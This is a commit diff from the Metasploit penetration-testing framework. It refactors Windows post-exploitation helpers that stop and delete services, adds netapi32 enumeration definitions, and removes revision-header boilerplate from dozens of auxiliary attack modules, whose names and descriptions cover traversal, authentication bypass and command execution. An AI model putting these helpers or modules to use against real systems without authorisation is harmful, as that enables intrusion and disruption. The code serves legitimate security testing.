# SC_MANAGER_SERVICE_STOP (0x0020)
open_sc_manager(:host=>server, :access=>1) do |manager|
# open with SERVICE_STOP (0x0020)
handle = adv.OpenServiceA(manager, name, 0x20)
if(handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
end
retval = adv.ControlService(handle["return"],1,56)
adv.CloseServiceHandle(handle["return"])
case retval["GetLastError"]
when 0; return 0 # worked
when 1062; return 1 # already stopped or disabled
when 1052; return 2 # cannot be stopped
end
end
end
#
# Delete a service.
#
# @param (see #service_start)
#
def service_delete(name, server=nil)
machine_str = server ? "\\\\#{server}" : nil
adv = session.railgun.advapi32
# #define SC_MANAGER_ALL_ACCESS 0xF003F
manag = adv.OpenSCManagerA(machine_str,nil,0xF003F)
if (manag["return"] == 0)
raise "Could not open Service Control Manager, Access Denied"
open_sc_manager(:host=>server) do |manager|
# Now to grab a handle to the service.
# Thank you, Wine project for defining the DELETE constant since it,
# and all its friends, are missing from the MSDN docs.
# #define DELETE 0x00010000
handle = adv.OpenServiceA(manager, name, 0x10000)
if (handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
end
# Lastly, delete it
adv.DeleteService(handle["return"])
adv.CloseServiceHandle(handle["return"])
handle["GetLastError"]
end
# Now to grab a handle to the service.
# Thank you, Wine project for defining the DELETE constant since it,
# and all its friends, are missing from the MSDN docs.
# #define DELETE 0x00010000
servhandleret = adv.OpenServiceA(manag["return"],name,0x10000)
if (servhandleret["return"] == 0)
adv.CloseServiceHandle(manag["return"])
raise "Could not Open Service, Access Denied"
end
# Lastly, delete it
adv.DeleteService(servhandleret["return"])
adv.CloseServiceHandle(manag["return"])
adv.CloseServiceHandle(servhandleret["return"])
end
end

2
lib/msf/core/post/windows/shadowcopy.rb
View File

@ -10,7 +10,7 @@ module Windows
# http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html
module ShadowCopy
include Msf::Post::Windows::WindowsServices
include Msf::Post::Windows::Services
#
# Get the device name for the shadow copy, which is used when accessing

2
lib/msf/scripts/meterpreter/services.rb
View File

@ -6,7 +6,7 @@ module Scripts
module Meterpreter
module Common
include ::Msf::Post::Windows::WindowsServices
include ::Msf::Post::Windows::Services
end
end

2
lib/packetfu/packetfu/protos/icmp.rb
View File

@ -124,7 +124,7 @@ module PacketFu
attr_accessor :eth_header, :ip_header, :icmp_header
def self.can_parse?(str)
return false unless str.size >= 54
return false unless str.size >= 38
return false unless EthPacket.can_parse? str
return false unless IPPacket.can_parse? str
return false unless str[23,1] == "\x01"

21
lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
View File

@ -35,6 +35,26 @@ class Def_netapi32
["DWORD","resume_handle","inout"]
])
dll.add_function('NetWkstaUserEnum', 'DWORD', [
["PWCHAR","servername","in"],
["DWORD","level","in"],
["PDWORD","bufptr","out"],
["DWORD","prefmaxlen","in"],
["PDWORD","entriesread","out"],
["PDWORD","totalentries","out"],
["DWORD","resume_handle","inout"]
])
dll.add_function('NetUserGetGroups', 'DWORD', [
["PWCHAR","servername","in"],
["PWCHAR","username","in"],
["DWORD","level","in"],
["PDWORD","bufptr","out"],
["DWORD","prefmaxlen","in"],
["PDWORD","entriesread","out"],
["PDWORD","totalentries","out"]
])
return dll
end
@ -42,4 +62,3 @@ end
end; end; end; end; end; end; end

5
modules/auxiliary/admin/2wire/xslt_password_reset.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
configuration changes (such as resetting the password) as administrators.
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' =>
[
'hkm [at] hakim.ws', #Initial discovery, poc

5
modules/auxiliary/admin/backupexec/dump.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm', 'Unknown' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2005-2611'],

5
modules/auxiliary/admin/backupexec/registry.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '17627' ],

5
modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change',
'Version' => '$Revision$',
'Description' => %q{
This module exploits an authentication bypass issue which allows arbitrary
password change requests to be issued for any user in the local store.

5
modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '19680' ],

5
modules/auxiliary/admin/db2/db2rcmd.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0795' ],

7
modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '60035'],
],
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Version' => '$Revision$'
'License' => MSF_LICENSE
))
register_options([

5
modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],

5
modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],

5
modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -34,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '65533'],

5
modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'ContentKeeper Web Appliance mimencode File Access',
'Version' => '$Revision$',
'Description' => %q{
This module abuses the 'mimencode' binary present within
ContentKeeper Web filtering appliances to retrieve arbitrary

5
modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '5798' ],

5
modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',
'Version' => '$Revision$',
'Description' => %q{
The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,
allowing for simple brute force attacks to bypass authentication and gain administrative

5
modules/auxiliary/admin/http/tomcat_administration.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Tomcat Administration Tool Default Access',
'Version' => '$Revision$',
'Description' => 'Detect the Tomcat administration interface.',
'References' =>
[

5
modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Tomcat UTF-8 Directory Traversal Vulnerability',
'Version' => '$Revision$',
'Description' => %q{
This module tests whether a directory traversal vulnerablity is present
in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0

5
modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'TrendMicro Data Loss Prevention 5.5 Directory Traversal',
'Version' => '$Revision$',
'Description' => %q{
This module tests whether a directory traversal vulnerablity is present
in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.

5
modules/auxiliary/admin/http/typo3_sa_2009_001.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'TYPO3 sa-2009-001 Weak Encryption Key File Disclosure',
'Version' => '$Revision$',
'Description' => %q{
This module exploits a flaw in TYPO3 encryption ey creation process to allow for
file disclosure in the jumpUrl mechanism. This flaw can be used to read any file

5
modules/auxiliary/admin/http/typo3_sa_2009_002.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '52048'],

5
modules/auxiliary/admin/http/typo3_sa_2010_020.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'TYPO3 sa-2010-020 Remote File Disclosure',
'Version' => '$Revision$',
'Description' => %q{
This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.
Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.

5
modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'TYPO3 Winstaller default Encryption Keys',
'Version' => '$Revision$',
'Description' => %q{
This module exploits known default encryption keys found in the TYPO3 Winstaller.
This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be

5
modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '40210' ],

5
modules/auxiliary/admin/motorola/wr850g_cred.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' => [
[ 'CVE', '2004-1550' ],
[ 'OSVDB', '10232' ],

5
modules/auxiliary/admin/ms/ms08_059_his2006.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'MSB', 'MS08-059' ],

7
modules/auxiliary/admin/mssql/mssql_enum.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
supplied.
},
'Author' => [ 'Carlos Perez <carlos_perez [at] darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
'License' => MSF_LICENSE
))
end

5
modules/auxiliary/admin/mssql/mssql_exec.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'tebo <tebo[at]attackresearch.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],

5
modules/auxiliary/admin/mssql/mssql_idf.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# Author: Robin Wood <robin@digininja.org> <http://www.digininja.org>
# Version: 0.1
@ -38,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'Robin Wood <robin[at]digininja.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.digininja.org/metasploit/mssql_idf.php' ],

5
modules/auxiliary/admin/mssql/mssql_sql.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'tebo <tebo [at] attackresearch [dot] com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.attackresearch.com' ],

5
modules/auxiliary/admin/mysql/mysql_enum.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://cisecurity.org/benchmarks.html' ]

7
modules/auxiliary/admin/mysql/mysql_sql.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary
against a MySQL instance given the appropriate credentials.
},
'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
'License' => MSF_LICENSE
))
register_options(

5
modules/auxiliary/admin/officescan/tmlisten_traversal.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
'Version' => '$Revision$',
'Description' => %q{
This module tests for directory traversal vulnerability in the UpdateAgent
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro

5
modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],

5
modules/auxiliary/admin/oracle/oracle_login.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ],

5
modules/auxiliary/admin/oracle/oracle_sql.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],

7
modules/auxiliary/admin/oracle/oraenum.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
run.
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
'License' => MSF_LICENSE
))
end

5
modules/auxiliary/admin/oracle/osb_execqr.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-5448' ],

5
modules/auxiliary/admin/oracle/osb_execqr2.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-1977' ],

5
modules/auxiliary/admin/oracle/osb_execqr3.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0904' ],

5
modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],

5
modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'CG' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.argeniss.com/research/oraclesqlinj.zip' ],

5
modules/auxiliary/admin/oracle/sid_brute.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],

5
modules/auxiliary/admin/oracle/tnscmd.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => ['MC'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'DisclosureDate' => 'Feb 1 2009'
))

5
modules/auxiliary/admin/pop2/uw_fileretrieval.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '368' ],

7
modules/auxiliary/admin/postgres/postgres_readfile.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'URL', 'http://michaeldaw.org/sql-injection-cheat-sheet#postgres' ]
],
'Version' => '$Revision$'
]
))
register_options(

7
modules/auxiliary/admin/postgres/postgres_sql.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -28,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'URL', 'www.postgresql.org' ]
],
'Version' => '$Revision$'
]
))
#register_options( [ ], self.class) # None needed.

5
modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'SAP Management Console OSExecute',
'Version' => '$Revision$',
'Description' => %q{
This module allows execution of operating system commands through the SAP
Management Console SOAP Interface. A valid username and password must be

5
modules/auxiliary/admin/scada/igss_exec_17.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2011-1566'],

1
modules/auxiliary/admin/scada/modicon_command.rb
View File

@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
],
'Version' => '$Revision$',
'DisclosureDate' => 'Apr 5 2012'
))
register_options(

1
modules/auxiliary/admin/scada/modicon_password_recovery.rb
View File

@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
],
'Version' => '$Revision$',
'DisclosureDate'=> 'Jan 19 2012'
))

1
modules/auxiliary/admin/scada/modicon_stux_transfer.rb
View File

@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
],
'Version' => '$Revision$',
'DisclosureDate' => 'Apr 5 2012'
))

1
modules/auxiliary/admin/scada/multi_cip_command.rb
View File

@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
],
'Version' => '$Revision$',
'DisclosureDate' => 'Jan 19 2012'))
register_options(

5
modules/auxiliary/admin/serverprotect/file.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'toto' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-6507' ],

5
modules/auxiliary/admin/smb/check_dir_file.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'SMB Scanner Check File/Directory Utility',
'Version' => '$Revision$',
'Description' => %Q{
This module is useful when checking an entire network
of SMB hosts for the presence of a known file or directory.

5
modules/auxiliary/admin/smb/list_directory.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'SMB Directory Listing Utility',
'Version' => '$Revision$',
'Description' => %Q{
This module lists the directory of a target share and path. The only reason
to use this module is if your existing SMB client is not able to support the features

5
modules/auxiliary/admin/smb/samba_symlink_traversal.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Samba Symlink Directory Traversal',
'Version' => '$Revision$',
'Description' => %Q{
This module exploits a directory traversal flaw in the Samba
CIFS server. To exploit this flaw, a writeable share must be specified.

5
modules/auxiliary/admin/smb/upload_file.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'SMB File Upload Utility',
'Version' => '$Revision$',
'Description' => %Q{
This module uploads a file to a target share and path. The only reason
to use this module is if your existing SMB client is not able to support the features

5
modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -35,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
'jduck' # Ported to MSF v3
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2003-0027'],

5
modules/auxiliary/admin/tikiwiki/tikidblib.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '30172'],

4
modules/auxiliary/admin/vmware/poweroff_vm.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit

4
modules/auxiliary/admin/vmware/poweron_vm.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit

4
modules/auxiliary/admin/vmware/tag_vm.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit

4
modules/auxiliary/admin/vmware/terminate_esx_sessions.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit

5
